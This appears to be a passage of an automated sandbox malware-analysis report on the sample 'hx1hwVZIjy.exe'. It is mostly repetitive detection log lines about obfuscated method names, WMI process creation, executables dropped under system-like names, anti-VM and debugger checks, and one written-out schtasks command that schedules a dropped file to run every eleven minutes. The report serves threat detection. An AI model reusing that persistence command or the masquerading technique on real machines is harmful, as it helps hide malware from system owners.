            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Jt8CxxmJ64G8yUjnbUT.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'Bx0Q0prhtoVDraC8RUn', 'CafRvxrf70NemiEC8FX', 'qVYjMxrWmtubic5QZVg', 'PTwKQqrHib1xs42KpYE', 'dLMQUYrLfeNRTePQwPB', 'mEp1exrneS3DNEhQFkO'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, MrZfWrF6t0EjslxUXd9.csHigh entropy of concatenated method names: '_223', 'RrPaJSWSrjuUBG5SXL0', 'y8LkdGW4EsMw9gO6D63', 'bLnGihWhbRBTcB7oP5N', 'WvVqIfWfv8J0g8uWXwD', 'ftMpwNWWX0XfGkeDasu', 'S8IFGDWHp8g0WIUUCJa', 'xVK3VxWLVpiufxZEoUj', 'lxPQBJWnOioBZLTMJpJ', 'B9p7dAWyZTkF1tCSSZQ'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, rwQr8sMOa8k6IjC5GbC.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, gwsBrqgAcTyaRGRXvHY.csHigh entropy of concatenated method names: 'wthEO6CAaJ', 'Il5EM0N1sS', 'uc5EWlunPj', 'UY9EjKwMFs', 'xbQESq4cRs', 'YSb6hwNhNimaXnaipED', 'g7IkasNSSekwuRxcrNk', 'rBnYODN4veUVddgvCvO', 'VxDSfHNfotOQY36d9Q4', 'y7lhNQNWVdyaUlxEHOW'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops PE files with benign system names
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Windows\Containers\serviced\wininit.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Recovery\smss.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\ReviewHost\conhost.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Windows\Containers\serviced\wininit.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Public\AFKwztugVSPq.exeJump to dropped file
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile created: C:\ReviewHost\brokercrt.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\user\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\ReviewHost\RuntimeBroker.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Recovery\smss.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Public\Videos\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default\WinStore.App.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\ReviewHost\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Public\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\user\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default\WinStore.App.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Windows\Containers\serviced\wininit.exeJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Public\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\user\AFKwztugVSPq.exeJump to dropped file
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default\WinStore.App.exeJump to dropped file
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exeJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\Default User\Start Menu\Programs\System Tools\4e3ac3462c9605Jump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ReviewHost\brokercrt.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
            Source: C:\ReviewHost\brokercrt.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeMemory allocated: 9C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeMemory allocated: 1A4E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeMemory allocated: DE0000 memory reserve | memory write watch
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeMemory allocated: 1AB00000 memory reserve | memory write watch
            Source: C:\ReviewHost\brokercrt.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\ReviewHost\brokercrt.exeWindow / User API: threadDelayed 1745Jump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeWindow / User API: threadDelayed 367
            Source: C:\ReviewHost\brokercrt.exe TID: 6616Thread sleep count: 1745 > 30Jump to behavior
            Source: C:\ReviewHost\brokercrt.exe TID: 6584Thread sleep count: 348 > 30Jump to behavior
            Source: C:\ReviewHost\brokercrt.exe TID: 3224Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 7064Thread sleep count: 329 > 30Jump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 7064Thread sleep count: 55 > 30Jump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 2104Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe TID: 3176Thread sleep count: 367 > 30
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ReviewHost\brokercrt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F3A5F4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F4B8E0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5AAA8 FindFirstFileExA,0_2_00F5AAA8
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4DD72 VirtualQuery,GetSystemInfo,0_2_00F4DD72
            Source: C:\ReviewHost\brokercrt.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeThread delayed: delay time: 922337203685477
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\userJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: wscript.exe, 00000002.00000003.2075195482.000000000294D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j^P
            Source: wscript.exe, 00000002.00000003.2075195482.000000000294D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\^d
            Source: hx1hwVZIjy.exe, 00000000.00000003.1990820074.0000000003352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\j$=
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeAPI call chain: ExitProcess graph end nodegraph_0-24385
            Source: C:\ReviewHost\brokercrt.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5866F
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5753D mov eax, dword ptr fs:[00000030h]0_2_00F5753D
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5B710 GetProcessHeap,0_2_00F5B710
            Source: C:\ReviewHost\brokercrt.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4F063 SetUnhandledExceptionFilter,0_2_00F4F063
